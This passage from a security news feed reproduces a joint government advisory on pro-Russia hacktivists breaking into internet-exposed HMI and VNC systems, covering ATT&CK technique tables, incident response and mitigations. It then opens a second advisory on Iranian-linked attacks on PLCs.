<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 3. Initial Access</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Internet Accessible Device</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0883/" target="_blank" title="T0883" data-entity-type="external">T0883</a></td>
<td>Threat actors gain access through less secure HMI devices exposed to the internet.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 4. Persistence</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Valid Accounts</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0859/" target="_blank" title="T0859" data-entity-type="external">T0859</a></td>
<td>Threat actors use password guessing tools to access legitimate accounts on the HMI devices.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 5. Credential Access</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Brute Force: Password Spraying</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T1110/003/" target="_blank" title="T1110.003" data-entity-type="external">T1110.003</a></td>
<td>Threat actors use tools to rapidly guess common or simple passwords.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 6. Lateral Movement</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Default Credentials</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0812/" target="_blank" title="T0812" data-entity-type="external">T0812</a></td>
<td>Threat actors seek and build libraries of known default passwords for control devices to access legitimate user accounts.</td>
</tr>
<tr>
<td>Remote Services</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0886/" target="_blank" title="T0886" data-entity-type="external">T0886</a></td>
<td>Threat actors leverage VNC services to access system HMI devices.</td>
</tr>
<tr>
<td>Remote Services: VNC</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T1021/005/" target="_blank" title="T1021.005" data-entity-type="external">T1021.005</a></td>
<td>Threat actors hunt VNC-enabled devices visible on the internet and connect with remote viewer software.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 7. Execution</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Graphical User Interface</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0823/" target="_blank" title="T0823" data-entity-type="external">T0823</a></td>
<td>Threat actors interact with HMI devices via GUIs, attempting to modify control devices.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 8. Inhibit Response Function</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Device Restart/Shutdown</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0816/" target="_blank" title="T0816" data-entity-type="external">T0816</a></td>
<td>While threat actors claim to turn off HMIs, it is possible that operators (not the threat actors) turn the devices off during incident response.</td>
</tr>
<tr>
<td>Alarm Suppression</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0878/" target="_blank" title="T0878" data-entity-type="external">T0878</a></td>
<td>Threat actors use HMI interfaces to clear alarms caused by their activity and alarms already present on the system at the time of their intrusion.</td>
</tr>
<tr>
<td>Change Credential</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0892/" target="_blank" title="T0892" data-entity-type="external">T0892</a></td>
<td>Threat actors change the usernames and passwords of HMI devices in operator lockout attempts, usually resulting in a loss of view and operators switching to manual operations.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 9. Impair Process Control</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">Technique Title</th>
<th role="columnheader">ID</th>
<th role="columnheader">Use</th>
</tr>
</thead>
<tbody>
<tr>
<td>Modify Parameter</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0836/" target="_blank" title="T0836" data-entity-type="external">T0836</a></td>
<td>Threat actors attempt to change upper and lower limits of operational devices as available from the HMI.</td>
</tr>
<tr>
<td>Unauthorized Command Message</td>
<td><a href="https://attack.mitre.org/techniques/T0855/" target="_blank" title="T0855" data-entity-type="external">T0855</a></td>
<td>Threat actors attempt to send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, causing possible impact.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em>Table 10. Impact</em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist"><a class="ck-anchor"><strong>Technique Title</strong></a></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Loss of Productivity and Revenue</td>
<td><a href="https://attack.mitre.org/versions/v18/techniques/T0828/" target="_blank" title="T0828" data-entity-type="external">T0828</a></td>
<td>Threat actors purposefully attempt to impact productivity and create additional costs for the affected entities.</td>
</tr>
<tr>
<td>Loss of View</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T0829/" target="_blank" title="T0829" data-entity-type="external">T0829</a></td>
<td>Threat actors change credentials on HMI devices, preventing operators from modifying processes remotely. </td>
</tr>
<tr>
<td>Manipulation of Control</td>
<td><a href="https://attack.mitre.org/versions/v15/techniques/T0831/" target="_blank" title="T0831" data-entity-type="external">T0831</a></td>
<td>Threat actors change setpoints in processes, impacting the efficiency of operations for those specific processes.  </td>
</tr>
</tbody>
</table>
<h2><strong>Incident Response</strong></h2>
<p>If organizations find exposed systems with weak or default passwords, they should assume threat actors compromised the system and begin the following incident response protocols:</p>
<ol>
<li><strong>Determine which hosts were compromised and isolate them</strong> by quarantining or taking them offline.</li>
<li><strong>Initiate threat hunting activities to scope the intrusion</strong>. Collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections.</li>
<li><strong>Reimage compromised hosts</strong>.</li>
<li><strong>Provision new account credentials</strong>.</li>
<li><strong>Report the compromise to CISA, FBI, and/or NSA</strong>. See the <a href="https://www.cisa.gov/#Contact" title="Contact Information"><strong>Contact Information</strong></a> section of this advisory.</li>
<li><strong>Harden the network to prevent additional malicious activity</strong>. See the <a href="https://www.cisa.gov/#Mitigations" title="Mitigations "><strong>Mitigations </strong></a>section of this advisory for guidance.</li>
</ol>
<h2><a class="ck-anchor"><strong>Mitigations</strong></a></h2>
<h3><strong>OT Asset Owners and Operators</strong></h3>
<p>The authoring organizations recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="CPGs">CPGs webpage</a> for more information on the CPGs, including additional recommended baseline protections.</p>
<ul>
<li><strong>Reduce exposure of OT assets to the public-facing internet.</strong> When connected to the internet, OT devices are easy targets for malicious cyber threat actors. Many devices can be found by searching for open ports on public IP ranges with search engine tools to target victims with OT components [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#SecureInternetFacingDevices3S" title="CPG 3.S">CPG 3.S</a>].
<ul>
<li><strong>Asset owners should use attack surface management services </strong>and web-based search platforms to scan the internet. This mitigation can help identify if there are VNC systems exposed within the IP ranges they own, especially for connections set up by third parties.<br><strong>Note:</strong> For more information on attack surface management, see CISA’s <a href="https://www.cisa.gov/resources-tools/resources/exposure-reduction" title="Internet Exposure Reduction Guidance">Internet Exposure Reduction Guidance</a>, CISA’s <a href="https://www.cisa.gov/cyber-hygiene-services" title="Cyber Hygiene Services">Cyber Hygiene Services</a> for U.S. critical infrastructure, and NSA’s <a href="https://www.nsa.gov/Portals/75/documents/resources/everyone/Attack%20Surface%20Management%20copy.pdf" target="_blank" title="Attack Surface Management" data-entity-type="external">Attack Surface Management</a> for the U.S. Defense Industrial Base.</li>
<li><strong>Implement network segmentation between IT and OT networks.</strong> Segmenting critical systems and introducing a demilitarized zone (DMZ) for passing control data to enterprise logistics reduces the potential impact of cyber threats and the risk of disruptions to essential OT operations [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ImplementLogicalPhysicalNetworkSegmentation3I" title="CPG 3.I">CPG 3.I</a>].</li>
<li><strong>Consider implementing a firewall and/or virtual private network</strong> if exposure to the internet is necessary for controlling access to devices.
<ul>
<li>Consider disabling public exposure by default and implementing time-limited remote access to reduce the amount of time systems are exposed.</li>
<li>Restrict and monitor both inbound and outbound traffic at OT perimeter firewalls. Configure OT perimeter firewalls to enforce a default-deny policy for all traffic. Asset owners should explicitly permit authorized destinations and protocols based on operational requirements.</li>
<li>Implement strict egress filtering to prevent unauthorized data exfiltration or command-and-control callbacks.</li>
<li>Regularly audit firewall rulesets and monitor outbound traffic patterns for anomalies indicative of threat actor activity, such as beaconing or unexpected protocol usage.</li>
</ul>
</li>
</ul>
</li>
<li><strong>Adopt mature asset management processes</strong>, including mapping data flows and access points. Generating a complete picture of both OT and IT assets provides visibility to operators and management, allowing organizations to monitor and assess deviations for criticality [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ManageOrganizationalAssets2A" title="CPG 2.A">CPG 2.A</a>].
<ul>
<li><strong>Keep remote access services updated </strong>with the latest version available and ensure all systems and software are up to date with patches and necessary security updates.
<ul>
<li>Keep VNC systems updated with the latest version available.</li>
</ul>
</li>
<li><strong>Refer to the joint </strong><a href="https://www.cisa.gov/resources-tools/resources/foundations-ot-cybersecurity-asset-inventory-guidance-owners-and-operators" title="Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators"><strong>Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators</strong></a> to help with reducing cybersecurity risk by identifying which assets within their environment should be secured and protected.</li>
</ul>
</li>
<li><strong>Ensure OT assets use robust authentication procedures.</strong>
<ul>
<li>Many devices lack robust authentication and authorization. Devices with weak authentication are vulnerable targets to threat actors using credential theft techniques.</li>
<li>Implement MFA where possible. Where MFA is not feasible, use strong, unique passwords. Apply password standards for operator-accessible services on underlying OT assets, as well as network devices protecting those services. This is especially important for services that require internet accessibility [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ChangingDefaultPasswords3A" title="CPG 3.A">CPG 3.A</a>] [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#EstablishMinimumPasswordStrength3B" title="CPG 3.B">CPG 3.B</a>] [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#CreateUniqueCredentials3C" title="CPG 3.C">CPG 3.C</a>] [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ImplementMultifactorAuthentication3F" title="CPG 3.F">CPG 3.F</a>].</li>
<li>Establish an allowlist that permits only authorized device IP addresses and/or media access control addresses. The allowlist can be refined to operator working hours to further obstruct malicious threat actor activity; organizations are encouraged to establish monitoring and alerting for access attempts not meeting these criteria [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#MonitorUnsuccessfulAutomatedLoginAttempts3E" title="CPG 3.E">CPG 3.E</a>].</li>
<li>Disable any unused authentication methods, logic, or features, such as default authentication keys and default passwords. Block all unused high ephemeral ports and monitor for attempted connections using standard protocols on non-standard ports [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#ProhibitConnectionofUnauthorizedDevices3R" title="CPG 3.R">CPG 3.R</a>].</li>
<li>Authenticate all access to field controllers before authorizing access to, or modification of, a device’s state, logic, program, or filesystems.</li>
</ul>
</li>
<li><strong>Enable control system security features </strong>that can separate and audit view and control functions. Limiting remotely accessible or default user accounts to “view-only” removes the potential for impact without exploiting a vulnerability [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#AdministratorsMaintainSeparateUserandPrivilegedAccounts3G" title="CPG 3.G">CPG 3.G</a>].</li>
<li><strong>Implement and practice business recovery/disaster recovery plans.</strong> Plans should also take into consideration redundancy, fail-safe mechanisms, islanding capabilities, backup restoration, and manual operation.
<ul>
<li>Include scenarios that necessitate switching to manual operations. Maintaining the capability of an organization to revert to manual controls to quickly restore operations is vital in the immediate aftermath of a cyber incident [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#IncidentPlanningandPreparedness6A" title="CPG 6.A">CPG 6.A</a>].</li>
<li>Create backups of the engineering logic, configurations, and firmware of HMIs to enable fast recovery. Organizations should routinely test backups and standby systems to ensure safe manual operations in the event of an incident [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#MaintainSystemBackupsRestorationAbility3O" title="CPG 3.O">CPG 3.O</a>].</li>
</ul>
</li>
<li><strong>Collect and monitor the traffic of OT assets and networking devices.</strong> This includes unusual logins or unexpected protocols communicating over the internet, and functions of ICS management protocols that change an asset’s operating mode or modify programs.</li>
<li><strong>Review configurations for setpoint ranges or tag values </strong>to stay within safe ranges and establish alerting for deviations.</li>
<li><strong>Take a proactive approach in the procurement process</strong> by following the guidance outlined in the joint guide <a href="https://www.cisa.gov/resources-tools/resources/secure-demand-priority-considerations-operational-technology-owners-and-operators-when-selecting" title="Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products">Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products</a>.</li>
</ul>
<h3>OT Device Manufacturers</h3>
<p>Although critical infrastructure organizations can take steps to mitigate risks, it is ultimately the responsibility of OT device manufacturers to build products that are secure by design. The authoring organizations urge device manufacturers to take ownership of the security outcomes of their customers in line with the joint guide <a href="https://www.cisa.gov/resources-tools/resources/secure-by-design" title="Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software">Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software</a>.</p>
<ul>
<li><strong>Eliminate default credentials and require strong passwords.</strong> The use of default credentials is a top weakness threat actors exploit to gain access to systems.</li>
<li><strong>Mandate MFA for privileged users.</strong> Changes to engineering logic or configurations are safety-impacting events in critical infrastructure. MFA should be available for safety critical components at no additional cost.</li>
<li><strong>Practice secure by default principles. </strong>OT components were initially designed without public internet connectivity in mind. When internet connection becomes necessary, implementing additional security measures is essential to safeguard these systems. Manufacturers should recognize insecure states and promptly inform users so they can make informed risk decisions.
<ul>
<li><strong>Include logging at no additional charge.</strong> Change and access control logs allow operators to track safety-impacting events in their critical infrastructure. These logs should be available for no cost and use open standard logging formats.</li>
</ul>
</li>
<li><strong>Publish Software Bill of Materials (SBOMs).</strong> Vulnerabilities in underlying software libraries can affect a wide range of devices. Without an SBOM, it is nearly impossible for a critical infrastructure system owner to measure and mitigate the impact of a vulnerability on their existing systems. See CISA’s <a href="https://www.cisa.gov/sbom" title="Software Bill of Materials">SBOM webpage</a> for more information.</li>
</ul>
<p>Additionally, see CISA’s <a href="https://www.cisa.gov/resources-tools/resources/secure-design-alert-how-software-manufacturers-can-shield-web-management-interfaces-malicious-cyber" title="Secure by Design Alert">Secure by Design Alert</a> on how software manufacturers can shield web management interfaces from malicious cyber activity. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing tiered security software and logs, monitoring, and making routine updates.</p>
<p>For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design</a> webpage.</p>
<h2><strong>Validate Security Controls</strong></h2>
<p>In addition to applying mitigations, the authoring organizations recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&amp;CK Matrix for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how it performs against the ATT&amp;CK techniques described in this advisory.</p>
<p>To start:</p>
<ol>
<li>Select an ATT&amp;CK technique described in this advisory (see <a href="https://www.cisa.gov/#Table1" title="Table 1"><strong>Table 1</strong></a> to<strong> </strong><a href="https://www.cisa.gov/#Table10" title="Table 10"><strong>Table 10</strong></a>).</li>
<li>Align your security technologies against the technique.</li>
<li>Test your technologies against the technique.</li>
<li>Analyze your detection and prevention technologies’ performance.</li>
<li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
<li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
</ol>
<p>The authoring organizations recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&amp;CK techniques identified in this advisory.</p>
<h2><strong>Resources</strong></h2>
<p>Entities requiring additional support for implementing any of the mitigations in this advisory should contact their regional CISA Cybersecurity Advisor for assistance. Key resources organizations should reference include:</p>
<ul>
<li>CISA, EPA, NSA, FBI, ASD’s ACSC, Cyber Centre, BSI, NCSC-NL, and NCSC-NZ’s <a href="https://www.cisa.gov/resources-tools/resources/foundations-ot-cybersecurity-asset-inventory-guidance-owners-and-operators" title="Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators">Foundations for OT Cybersecurity: Asset Inventory Guidance for Owners and Operators</a> offers best practices to assist organizations in identifying and prioritizing which assets should be secured and protected.</li>
<li>CISA, FBI, NSA, EPA, DOE, USDA, FDA, MS-ISAC, Cyber Centre, and NCSC-UK’s guidance on <a href="https://www.cisa.gov/resources-tools/resources/defending-ot-operations-against-ongoing-pro-russia-hacktivist-activity" title="Defending OT Operations Against Ongoing Pro-Russia Hacktivist Activity">Defending OT Operations Against Ongoing Pro-Russia Hacktivist Activity</a> that can help organizations protect OT systems from pro-Russia hacktivist activity.</li>
<li>NSA and CISA’s guidance on <a href="https://media.defense.gov/2022/Sep/22/2003083007/-1/-1/0/CSA_ICS_Know_the_Opponent_.PDF" target="_blank" title="Control System Defense: Know the Opponent" data-entity-type="external">Control System Defense: Know the Opponent</a> helps organizations defend OT and ICS assets against malicious cyber activity.</li>
<li>CISA and EPA’s resource page on <a href="https://www.cisa.gov/water" title="Water and Wastewater Cybersecurity">Water and Wastewater Cybersecurity</a> to help organizations reduce risks posed by malicious cyber actors targeting water and wastewater systems.
<ul>
<li>For additional guidance, see CISA, EPA, and FBI’s fact sheet on <a href="https://www.cisa.gov/resources-tools/resources/top-cyber-actions-securing-water-systems" title="Top Cyber Actions for Securing Water Systems">Top Cyber Actions for Securing Water Systems</a>.</li>
</ul>
</li>
<li>The Food and Ag-ISAC’s best practices on <a href="https://www.idfa.org/wordpress/wp-content/uploads/2023/07/Food-and-Ag-ISAC-Cybersecurity-Guide-2023_IDFA.pdf" target="_blank" title="Food and Ag Cybersecurity: A Guide for Small &amp; Medium Enterprises" data-entity-type="external">Food and Ag Cybersecurity: A Guide for Small &amp; Medium Enterprises</a> provides recommendations to help mitigate against cyber threats.</li>
<li>DOE and National Association of Regulatory Utility Commissioners <a href="https://www.naruc.org/core-sectors/critical-infrastructure-and-cybersecurity/cybersecurity-for-utility-regulators/cybersecurity-baselines/" target="_blank" title="Cybersecurity Baselines for Electric Distribution Systems and Distributed Energy (DER)" data-entity-type="external">Cybersecurity Baselines for Electric Distribution Systems and Distributed Energy (DER)</a> webpage provides resources for state public utility commissions and utilities, as well as DER operators and aggregators to help mitigate cybersecurity risks.</li>
</ul>
<p>Additional resources that apply to this advisory include:</p>
<ul>
<li>EPA’s <a href="https://www.epa.gov/cyberwater/epa-cybersecurity-water-sector" target="_blank" title="Cybersecurity for the Water Sector" data-entity-type="external">Cybersecurity for the Water Sector</a> resource page provides organizations with guidance on implementing basic cyber hygiene practices.</li>
<li>CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> enables critical infrastructure organizations to reduce the likelihood and impact of known risks and adversary techniques.</li>
<li>CISA’s <a href="https://www.cisa.gov/audiences/small-and-medium-businesses/secure-your-business/require-strong-passwords" title="Require Strong Passwords">Require Strong Passwords</a> webpage supports small and medium-sized businesses mitigating against malicious cyber activity that targets weak passwords.</li>
<li>CISA, NSA, FBI, EPA, TSA, and international partners’ guidance <a href="https://www.cisa.gov/resources-tools/resources/secure-demand-priority-considerations-operational-technology-owners-and-operators-when-selecting" title="Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products">Secure by Demand: Priority Considerations for Operational Technology Owners and Operators when Selecting Digital Products</a>.</li>
<li>DOE’s guidance on <a href="https://www.energy.gov/ceser/cyber-informed-engineering" target="_blank" title="Cyber-Informed Engineering" data-entity-type="external">Cyber-Informed Engineering</a> recommends considering cyber-enabled risks during the conception, design, and development phases when manufacturing physical systems.</li>
<li>CISA’s <a href="https://www.cisa.gov/cyber-hygiene-services" title="Cyber Hygiene Services">Cyber Hygiene Services</a> help enable critical infrastructure organizations to reduce their exposure to threats by taking a proactive approach to monitoring and mitigating attack vectors.</li>
<li>CISA, NSA, FBI, and international partners’ guidance on <a href="https://www.cisa.gov/resources-tools/resources/secure-by-design" title="Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software">Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software</a> urges software manufacturers to provide customers with products that are safer and more secure.
<ul>
<li>See more information in these Secure by Design Alerts: <a href="https://www.cisa.gov/resources-tools/resources/secure-design-alert-how-manufacturers-can-protect-customers-eliminating-default-passwords" title="How Manufacturers Can Protect Customers by Eliminating Default Passwords">How Manufacturers Can Protect Customers by Eliminating Default Passwords</a> and <a href="https://www.cisa.gov/resources-tools/resources/secure-design-alert-how-software-manufacturers-can-shield-web-management-interfaces-malicious-cyber" title="How Software Manufacturers Can Shield Web Management Interfaces From Malicious Cyber Activity">How Software Manufacturers Can Shield Web Management Interfaces From Malicious Cyber Activity</a>.</li>
</ul>
</li>
</ul>
<h2><a class="ck-anchor"><strong>Contact Information</strong></a></h2>
<p><strong>U.S. organizations</strong> are encouraged to report suspicious or criminal activity related to information in this advisory to CISA, FBI, and/or NSA:</p>
<ul>
<li>Contact CISA via CISA’s 24/7 Operations Center at <a href="mailto:contact@cisa.dhs.gov" title="contact@cisa.dhs.gov">contact@cisa.dhs.gov</a> or 1-844-Say-CISA (1-844-729-2472) or your local <a href="https://www.fbi.gov/contact-us/field-offices" target="_blank" title="FBI field office" data-entity-type="external">FBI field office</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.</li>
<li>For NSA cybersecurity guidance inquiries, contact <a href="mailto:CybersecurityReports@nsa.gov" target="_blank" title="CybersecurityReports@nsa.gov">CybersecurityReports@nsa.gov</a>.</li>
</ul>
<p><strong>Australian organizations:</strong> Visit <a href="https://www.cyber.gov.au/" target="_blank" title="cyber.gov.au" data-entity-type="external">cyber.gov.au</a> or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.</p>
<p><strong>Canadian organizations:</strong> Report incidents by emailing Cyber Centre at <a href="mailto:contact@cyber.gc.ca" target="_blank" title="contact@cyber.gc.ca">contact@cyber.gc.ca</a>.</p>
<p><strong>New Zealand organizations:</strong> Report cyber security incidents to <a href="mailto:incidents@ncsc.govt.nz" target="_blank" title="incidents@ncsc.govt.nz">incidents@ncsc.govt.nz</a> or call 04 498 7654.</p>
<p><strong>United Kingdom organizations:</strong> Report a significant cyber security incident: <a href="https://report.ncsc.gov.uk/" target="_blank" title="report.ncsc.gov.uk" data-entity-type="external">report.ncsc.gov.uk</a> (monitored 24 hours) or, for urgent assistance, call 03000 200 973.</p>
<h2><strong>Disclaimer</strong></h2>
<p>The information in this report is being provided “as is” for informational purposes only. The authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI and co-sealers.</p>
<h2><strong>Acknowledgements</strong></h2>
<p>Schneider Electric, Nozomi Networks, Eversource Energy, Electricity Information Sharing and Analysis Center, Chevron, BP, and Dragos contributed to this advisory.</p>
<h2><strong>Version History</strong></h2>
<p><strong>December 09, 2025:</strong> Initial version.</p>
<h2><strong>Appendix A: Targeting Methodologies for Pro-Russia Hacktivist Groups</strong></h2>
<p>For further information on targeting methodologies for pro-Russia hacktivist groups, see:</p>
<ul>
<li>CISA’s alert <a href="https://www.cisa.gov/news-events/alerts/2025/05/06/unsophisticated-cyber-actors-targeting-operational-technology" title="Unsophisticated Cyber Threat Actor(s) Targeting Operational Technology">Unsophisticated Cyber Threat Actor(s) Targeting Operational Technology</a>;</li>
<li>The joint fact sheet <a href="https://www.cisa.gov/resources-tools/resources/primary-mitigations-reduce-cyber-threats-operational-technology" title="Primary Mitigations to Reduce Cyber Threats to Operational Technology">Primary Mitigations to Reduce Cyber Threats to Operational Technology</a>; and</li>
<li>CISA’s <a href="https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/russia" title="Russia Cyber Threat">Russia Cyber Threat</a> webpage.</li>
</ul>
<h2><a class="ck-anchor"><strong>Appendix B: Additional Designators Used for Cited Groups</strong></a></h2>
<p>The cybersecurity industry and cyber actor groups often use various names to reference actor groups. While not exhaustive, the following are the most notable names used within the cybersecurity community to reference the groups in this advisory.</p>
<p><strong>Note:</strong> Cybersecurity organizations have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the authoring organizations’ understanding for all activity related to these groupings.</p>
<ul>
<li>GRU military unit 74455
<ul>
<li>Sandworm Team</li>
<li>Voodoo Bear</li>
<li>Seashell Blizzard</li>
<li>APT44</li>
</ul>
</li>
<li>Cyber Army of Russia Reborn (CARR)
<ul>
<li>CyberArmy of Russia</li>
<li>Народная CyberАрмия (НКА)</li>
<li>People’s CyberArmy of Russia (PCA)</li>
<li>Russian CyberArmy Team (RCAT)</li>
</ul>
</li>
<li>NoName057(16)
<ul>
<li>NoName057(16) Spain</li>
<li>NoName057(16) Italy</li>
<li>NoName057(16) France</li>
</ul>
</li>
<li>Z-Pentest
<ul>
<li>Z-Pentest Beograd</li>
<li>Z-Pentest Alliance</li>
<li>Z-Alliance</li>
</ul>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure]]></title>
<description><![CDATA[Advisory at a Glance



Title
Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure


Original Publication
April 7, 2026


Last Update 
July 22, 2026


Executive Summary
The authoring agencies urgently warn U.S. organizations of ongoing Iranian-a...]]></description>
<link>https://tsecurity.de/de/3693379/sicherheitsluecken/iranian-affiliated-cyber-actors-exploit-programmable-logic-controllers-across-us-critical-infrastructure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693379/sicherheitsluecken/iranian-affiliated-cyber-actors-exploit-programmable-logic-controllers-across-us-critical-infrastructure/</guid>
<pubDate>Sat, 25 Jul 2026 09:12:34 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><strong>Advisory at a Glance</strong></h2>
<table>
<tbody>
<tr>
<th>Title</th>
<td>Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure</td>
</tr>
<tr>
<th>Original Publication</th>
<td><strong>April 7, 2026</strong></td>
</tr>
<tr>
<th>Last Update </th>
<td><strong>July 22, 2026</strong></td>
</tr>
<tr>
<th>Executive Summary</th>
<td>The authoring agencies urgently warn U.S. organizations of ongoing Iranian-affiliated cyber targeting of internet-connected operational technology (OT) devices, including programmable logic controllers (PLCs). These actions disrupted PLCs across several U.S. critical infrastructure sectors through malicious project file interactions and manipulation of data on human machine interface (HMI) and supervisory control and data acquisition (SCADA) displays, resulting in operational disruption and financial loss.</td>
</tr>
<tr>
<th>Last Update Description</th>
<td>This update adds new guidance on detecting malicious changes in reusable code modules exploited within Rockwell Automation PLC programs. It also expands scope to include observed targeting of Schneider Electric, Siemens, and potentially other branded/manufactured PLCs, emphasizing the importance of restricting direct internet access and providing best practices for secure deployment.</td>
</tr>
<tr>
<th>Affected Products</th>
<td>Potentially all internet exposed PLCs, including Rockwell Automation/Allen-Bradley, Schneider Electric, Siemens, and other branded/manufactured PLCs.</td>
</tr>
<tr>
<th>Key Actions</th>
<td>
<ul type="square">
<li>Install PLCs consistent with manufacturers' guidelines and security best practices.</li>
